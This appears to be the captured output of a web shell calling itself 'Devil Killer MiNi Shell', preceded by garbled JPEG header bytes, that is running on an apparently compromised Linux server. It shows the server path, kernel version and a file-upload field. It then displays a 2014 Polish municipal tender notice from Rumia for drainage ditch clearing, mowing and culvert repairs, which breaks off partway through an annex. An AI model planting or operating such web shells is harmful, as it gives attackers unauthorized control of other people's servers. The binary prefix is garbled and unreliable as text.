JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141021/223139-N-2014.html

<p class="kh_header"><b>Rumia: Odmulanie, wykaszanie i remonty urządzeń melioracyjnych na terenie Miasta Rumi w podziale na części.</b><br>
<b>Numer ogłoszenia: 223139 - 2014; data zamieszczenia: 21.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Rumia , ul. Sobieskiego 7/204, 84-230 Rumia, woj. pomorskie, tel. 058 6719410, faks 058 6796517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.rumia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odmulanie, wykaszanie i remonty urządzeń melioracyjnych na terenie Miasta Rumi w podziale na części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi odmulania, wykaszania i remonty urządzeń melioracyjnych na terenie Miasta Rumi.
2.	Zakres zamówienia obejmuje wykonanie następujących prac:
Część I
Zadanie nr 1: - wykonanie zabezpieczenia ulicy Tkackiej i ul. Włókienniczej przed zalewaniem wodami opadowymi z terenu cmentarza komunalnego w Rumi.  
Przedmiotem zamówienia jest wykonanie robót melioracyjnych, polegających na:
1)	Wykonaniu na terenie cmentarza komunalnego w Rumi 3 szt. progów przekierowujących wody opadowe z brukowca o wym. 16-20 cm, układanego na podbudowie z kamienia łamanego z klincem kamiennym oraz podbudowie z betonu, (2 szt. progów na drodze powyżej bramy przy ul. Tkackiej - o wym. 4,5 m x 3,0 m i 5,0 m x 4,0 m, oraz 1 szt. na drodze wewnętrznej powyżej bramy przy ul. Włókienniczej - o wym. 7,0 m x 4,0 m),
2)	Wykonanie 2 rowów zbierających i odprowadzających wody opadowe z progów do osadników, o szerokości dna do 0,8 m wybrukowanych z kamienia o grubości 15 cm, na zaprawie betonowej o wym. (8 m + 7 m) x 1,0 m3,
3)	Wykonanie 3 osadników na wody opadowe w kształcie elipsy o maksymalnych wymiarach ( Tkacka 2 szt. 16,0 m x 8,0 m x 1,5 m i 11,0 m x 6,0 m x 1,5 m, Włókiennicza 1 szt. 15,0 m x 5,0 m x 1,5 m), zabezpieczenie skarp podwójną kiszką faszynową O 20cm oraz wydarniowanie skarp pasem darniny o szerokości 0,5 m,
4)	Wykonanie przepustu w rowie pomiędzy  dwoma osadnikami, zlokalizowanymi przy ulicy Tkackiej, o wym. L= 5 m średnicy 60 cm z przyczółkami umocnionymi płytami betonowymi.
Część II
Zadanie nr 2: - Odmulenie sieci rowów melioracyjnych  przy Rodzinnych Ogrodach Działkowych w rejonie ulicy Kazimierskiej w Rumi.
Przedmiotem zamówienia jest wykonanie robót melioracyjnych, polegających na:
1)	Odmuleniu mechanicznym rowów wraz z rozplantowaniem urobku warstwą grubości do 10 cm na poboczach rowów koparkami podsiębiernymi z osprzętem do odmulania.
2)	Ręczne przycięcie i odłożenie nawisów na poboczach rowów. Zebranie i wywiezienie nieczystości po rozplantowaniu urobku do zakładu Eko Dolina Sp. z o.o. Łężyce, usunięcie zatorów z pływającej roślinności,  
3)	Oczyszczenie przepustów o zamuleniu do 1/3 średnicy posadowionych na trasie konserwacji gruntownej rowów,
4)	 Łączna długość rowów do odmulenia 1355 mb, parametry rowów - głębokość do 2,0 m, grubość warstwy namułu do 50 cm, szer. dna do 0,8 m, nachylenie skarp 1:1,5.            
Część III
Zadanie nr 3: Odtworzenie rowu przy ul. Torfowej w Rumi
Przedmiotem zamówienia jest wykonanie robót melioracyjnych, polegających na:
1)	Odmulenie rowu przy ul. Torfowej (prawa strona) na odcinku 295 mb, pogłębienie do rzędnej dna pierwotnego, wykopy z wywozem urobku, warstwa namułu do 50 cm,
2)	Wyprofilowanie skarp rowu, ręczne obrobienie na czysto po koparce,
3)	Zebranie i wywóz na wysypisko Eko Dolina Sp. z o.o. Łężyce zalegających w rowie, śmieci, karpin, gałęzi i porostów pozostałych po wykoszeniu rowu,
4)	 Wykonanie remontu uszkodzonych 3 szt. przepustów z rur betonowych na przepusty z rur żelbetowych o średnicy 500 mm i L=5 mb każdy. Rozbiórka i wywóz na wysypisko śmieci uszkodzonych przewodów rurowych, ułożenie nowego przewodu na rusztach drewnianych i geotkaninie o wytrzymałości 200 kN/m, podsypce żwirowej grubości 20 cm. Obsypanie gruntem dowiezionym (pospółka), zagęszczenie nasypu, utwardzenie nawierzchni nad przepustem kruszywem (warstwa grubości 40 cm - 8m2/mb) Umocnienie wlotu i wylotu przepustu płytami prefabrykowanymi na podsypce piaskowej i geowłókninie (20 m2). Wykonanie palisady z kołków drewnianych o średnicy 7-9 cm, L= 1,2m w dnie rowu (5 mb). Umocnienie kiszką faszynową średn. 2x20 cm - (odcinek 20 mb), narzut kamienny w dnie (1 m3). Darniowanie skarp na płask (20m2). Pompowanie wody z wykopu, wykonanie tymczasowego rurociągu dla odprowadzenia wód, grodze ziemne. Głębokość rowów do 2,0m , szer. dna do 0,8m, nachylenie skarp 1:1,5.
Część IV
Zadanie nr 4: Wykoszenie porostów ze skarp i z dna rowów melioracyjnych na terenie miasta Rumi.
Przedmiotem zamówienia jest wykonanie robót melioracyjnych, polegających na:
1) wykaszaniu traw i porostów gęstych twardych ze skarp i dna rowów o łącznej długości 8,214 km, wygrabieniu wykoszonych porostów, zebranie i wywiezieniu śmieci zalegających na skarpach i w dnie rowów do zakładu Eko Dolina Sp. z o.o. Łężyce. Zakres robót obejmuje następujące rowy i kanały melioracyjne:
a) rów graniczny L3-14 na odcinku od ul. Jeziornej do granicy miasta - 2550 mb,
b) rów L3-17 przy Jeziornej-lewa strona - 850 mb,
c) rów 9L3-14 od piaskownika przy ul. Kosynierów do rowu granicznego - 1350 mb,
d) rowy przy ul. Torfowej - 550mb,
e) rowy przy ul. Różanej - 1680 mb,
f) rów od piaskownika przy ul. Grottgera do końca - 506 mb,
g) rów od ujścia kanalizacji deszczowej ul. Chmielna do przepustu pod ul. Św. Józefa   - 368 mb,
h) rów przy ul. Źródlanej - 70 mb,
i) rów przy ul. Stefana Batorego (II część ulicy) - 150 mb,
j) rów przy ul. Nagietkowej - 140 mb.  
2) oczyszczeniu przepustów o zamuleniu do 1/3 średnicy, posadowionych na trasie konserwacji bieżącej rowów. 
3) oczyszczeniu ujścia rowów bocznych do 2m w głąb. Głębokość rowów do 2,0 m, szer. dna do 0,8 m, nachylenie skarp 1:1,5..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.11.20.00-8, 77.00.00.00-3, 28.83.20.00-3, 45.11.21.00-6, 45.23.24.52-5, 90.51.36.00-2, 45.11.27.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania niezbędnej wiedzy i doświadczenia lub polegania na wiedzy i doświadczeniu  innych podmiotów, tj. 
         Część I  -  Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia poprzez realizację co najmniej dwóch kontraktów o wartości minimum 50.000 zł brutto każdy, na usługi w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o charakterze odpowiadającym przedmiotowi zamówienia tj. wykonanie progów lub umocnień z kamienia na podbudowie  betonowej na rzekach, rowach lub kanałach melioracyjnych;
         Część II - Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia poprzez realizację co najmniej dwóch kontraktów o wartości minimum 45.000 zł brutto każdy, na usługi w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o charakterze odpowiadającym przedmiotowi zamówienia tj. wykonanie usług związanych z odmulaniem i pogłębianiem sieci rowów melioracyjnych, kanałów melioracyjnych i rzek o długości min. 1,0 km wraz z utrzymaniem budowli melioracyjnych;
        Część III - Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia poprzez realizację co najmniej dwóch kontraktów o wartości minimum 30.000 zł brutto każdy, na usługi w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o charakterze odpowiadającym przedmiotowi zamówienia tj. wykonanie usług związanych z  utrzymaniem i konserwacją gruntowną sieci rowów, kanałów melioracyjnych i rzek wraz z utrzymaniem budowli melioracyjnych o długości minimum 1,0 km;
         Część IV - Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia poprzez realizację co najmniej dwóch kontraktów o wartości minimum 40.000 zł brutto każdy, na usługi w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o charakterze odpowiadającym przedmiotowi zamówienia tj. wykonanie usług związanych z  wykoszeniem min. 5,0 km rowów lub kanałów melioracyjnych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  warunek  za  spełniony,  jeżeli  Wykonawca   wykaże,  że dysponuje lub  będzie  dysponować  na  czas  realizacji  zamówienia  narzędziami i urządzeniami niezbędnymi do wykonania zamówienia, tj. Wykonawcy  winni udokumentować, że dysponują lub będą dysponowali  co najmniej niżej wymienionym sprzętem:
Część I i III:
1)	koparko-odmularka kołowa - min. 1 szt. 
2)	samochód samowyładowczy 8-15 t - min. 1 szt. 
3)	ciągnik lub inny pojazd z przyczepą - min 1 szt. 
4)	kosa spalinowa - min. 2 szt. 
Część II:
1)	 koparka gąsienicowa z osprzętem melioracyjnym - min. 1 szt. 
2)	ciągnik lub inny pojazd z przyczepą - min 1 szt. 
3)	kosa spalinowa - min. 2 szt. 
 Część IV:
1)	 ciągnikowa kosiarka bijakowa - min. 1 szt. 
2)	Kosiarka rotacyjna - min 1 szt. 
3)	kosa spalinowa - min. 2 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować, że dysponują lub będą dysponowali osobami które będą uczestniczyć w wykonaniu  zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności tj. co najmniej 1 osobą na część I i III 
z wykształceniem  i uprawnieniami do nadzoru robót hydrotechnicznych i melioracyjnych oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się zmianę terminu realizacji poszczególnych części dotyczących przedmiotu zamówienia, o których mowa w Rozdziale II ust. 2, po uzyskaniu akceptacji Zamawiającego.
2.	Dopuszcza się możliwość aneksowania umowy w przypadku zmiany kluczowego personelu Wykonawcy i Zamawiającego.
3.	Zamawiający dopuszcza zmianę terminu realizacji danej części, w przypadku zaistnienia następujących okoliczności:
1) wystąpienia niesprzyjających warunków atmosferycznych, powodujących wstrzymanie realizacji umowy i mających wpływ na termin realizacji przedmiotu zamówienia;
2) opóźnień Zamawiającego w zakresie dokonywania odbiorów;
3) zmian spowodowanych nieprzewidzianymi warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: niewypały i niewybuchy, wykopaliska archeologiczne, ekshumacje;
4) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.rumia.pl (zamówienia publiczne - przetargi aktualne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Rumi, 84-230 Rumia, ul. Sobieskiego 7, Referat Zamówień Publicznych, Pokój nr 213..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2014 godzina 09:30, miejsce: Urząd Miasta Rumi, 84-230 Rumia, ul. Sobieskiego 7, Sekretariat, Pokój nr 204..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie zabezpieczenia ulicy Tkackiej i ul. Włókienniczej przed zalewaniem wodami opadowymi z terenu cmentarza komunalnego w Rumi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót melioracyjnych, polegających na:
1)	Wykonaniu na terenie cmentarza komunalnego w Rumi 3 szt. progów przekierowujących wody opadowe z brukowca o wym. 16-20 cm, układanego na podbudowie z kamienia łamanego z klincem kamiennym oraz podbudowie z betonu, (2 szt. progów na drodze powyżej bramy przy ul. Tkackiej - o wym. 4,5 m x 3,0 m i 5,0 m x 4,0 m, oraz 1 szt. na drodze wewnętrznej powyżej bramy przy ul. Włókienniczej - o wym. 7,0 m x 4,0 m),
2)	Wykonanie 2 rowów zbierających i odprowadzających wody opadowe z progów do osadników, o szerokości dna do 0,8 m wybrukowanych z kamienia o grubości 15 cm, na zaprawie betonowej o wym. (8 m + 7 m) x 1,0 m3,
3)	Wykonanie 3 osadników na wody opadowe w kształcie elipsy o maksymalnych wymiarach ( Tkacka 2 szt. 16,0 m x 8,0 m x 1,5 m i 11,0 m x 6,0 m x 1,5 m, Włókiennicza 1 szt. 15,0 m x 5,0 m x 1,5 m), zabezpieczenie skarp podwójną kiszką faszynową O 20cm oraz wydarniowanie skarp pasem darniny o szerokości 0,5 m,
4)	Wykonanie przepustu w rowie pomiędzy  dwoma osadnikami, zlokalizowanymi przy ulicy Tkackiej, o wym. L= 5 m średnicy 60 cm z przyczółkami umocnionymi płytami betonowymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.52-5, 45.11.27.10-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odmulenie sieci rowów melioracyjnych  przy Rodzinnych Ogrodach Działkowych w rejonie ulicy Kazimierskiej w Rumi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót melioracyjnych, polegających na:
1)	Odmuleniu mechanicznym rowów wraz z rozplantowaniem urobku warstwą grubości do 10 cm na poboczach rowów koparkami podsiębiernymi z osprzętem do odmulania.
2)	Ręczne przycięcie i odłożenie nawisów na poboczach rowów. Zebranie i wywiezienie nieczystości po rozplantowaniu urobku do zakładu Eko Dolina Sp. z o.o. Łężyce, usunięcie zatorów z pływającej roślinności,  
3)	Oczyszczenie przepustów o zamuleniu do 1/3 średnicy posadowionych na trasie konserwacji gruntownej rowów,
